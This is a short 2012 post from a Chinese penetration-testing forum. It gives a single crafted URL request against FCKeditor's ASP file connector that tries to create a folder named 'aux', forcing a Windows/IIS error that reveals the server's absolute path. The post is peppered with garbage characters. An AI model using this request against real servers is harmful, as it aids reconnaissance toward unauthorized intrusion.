中国网络渗透测试联盟

标题: 最新FCKeditor爆绝对路径漏洞 [打印本页]
作者: admin    时间: 2012-11-21 13:39
标题: 最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux' _' r4 n& R/ t1 p

  [. i: [, t$ Q" E% B, \- c
3 [, `8 _. p$ E2 \; ^7 n/ Y% q版本未测试。。。* Z' u: {. ~% A/ n! a0 K! m, w
' i: W( g! P5 v: n! S( Q
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
1 A9 U8 o' V- \( F. s* r
7 m! x4 V8 [! }
6 }. @  ]0 U. A& x3 G听说IIS都可以。。
9 H- @) Q( q# b- L# B/ Z5 F



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2